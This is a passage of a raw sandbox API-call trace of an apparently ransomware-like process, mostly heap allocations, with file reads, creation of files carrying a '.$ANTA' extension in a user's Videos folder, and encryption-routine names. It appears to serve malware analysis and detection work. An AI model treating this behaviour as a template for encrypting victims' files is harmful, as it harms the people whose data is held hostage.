returned 1 [0098.296] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0098.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a80 | out: hHeap=0x1780000) returned 1 [0098.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0098.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369fd8 | out: hHeap=0x1780000) returned 1 [0098.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0098.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0098.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0098.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0098.297] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369cc0 [0098.297] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc")) returned 0x10 [0098.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369cc0 | out: hHeap=0x1780000) returned 1 [0098.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0098.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369f80 | out: hHeap=0x1780000) returned 1 [0098.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0098.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0098.297] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0098.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0098.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0098.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0098.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0098.298] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\9zsS8CRW.avi.$ANTA" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\9zss8crw.avi.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0098.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0098.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0098.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0098.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0098.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0098.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0098.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0098.298] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0098.298] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0098.298] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0098.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0098.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0098.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0098.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0098.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0098.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0098.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0098.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0098.299] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0098.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac740 | out: hHeap=0x1780000) returned 1 [0098.299] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0098.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0098.299] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0098.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0098.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0098.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0098.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0098.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0098.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0098.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0098.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0098.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d68 [0098.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0098.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0098.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0098.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0098.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0098.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0098.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e04020 [0098.303] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0098.303] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0xa962, lpOverlapped=0x0) returned 1 [0098.305] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0098.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0098.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0098.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0098.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0098.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa962) returned 0x4516010 [0098.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e04020 | out: hHeap=0x1780000) returned 1 [0098.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0098.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0098.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0098.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0098.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0098.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa962) returned 0x4520980 [0098.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0098.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0098.309] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0098.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0098.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0098.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0098.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0098.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0098.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa962) returned 0x4516010 [0098.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0098.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0098.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0098.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0098.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0098.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0098.309] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0098.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0098.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0098.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0098.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0098.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0098.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0098.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0098.310] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0098.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0098.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0098.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ab8 [0098.310] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0098.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ab8 | out: hHeap=0x1780000) returned 1 [0098.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0098.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0098.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26f0 [0098.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0098.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0098.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0098.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0098.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa962) returned 0x4516010 [0098.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0098.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2550 [0098.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0098.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0098.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0098.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25c0 [0098.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0098.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0098.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0098.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25f0 [0098.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0098.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0098.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0098.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca370 [0098.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0098.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0098.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0098.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0098.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0098.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa962) returned 0x452b2f0 [0098.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0098.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0098.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0098.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0098.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0098.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0098.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0098.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0098.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0098.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0098.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0098.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0098.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0098.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0098.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0098.312] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0098.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0098.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0098.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0098.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0098.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0098.312] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0098.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0098.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0098.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0098.312] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0098.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0098.312] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0098.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0098.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0098.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0098.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0098.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0098.313] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0098.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0098.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0098.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0098.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2690 [0098.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0098.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0098.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0098.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0098.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca430 [0098.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0098.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0098.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0098.313] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0098.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0098.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0098.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0098.313] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0098.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0098.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0098.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0098.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0098.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0098.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0098.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0098.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0098.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0098.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0098.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0098.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0098.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797008 [0098.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0098.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0098.314] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0098.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0098.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0098.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0098.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0098.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0098.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0098.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0098.315] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0098.315] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0098.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0098.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0098.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0098.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0098.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0098.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0098.315] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0098.315] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0098.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0098.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0098.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0098.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0098.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0098.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0098.315] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0098.315] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0098.315] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0098.315] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0098.315] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0098.315] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0098.315] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0098.316] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0098.316] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0098.316] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0098.316] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0098.316] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0098.316] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a80 [0098.316] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0098.316] HeapFree (in: 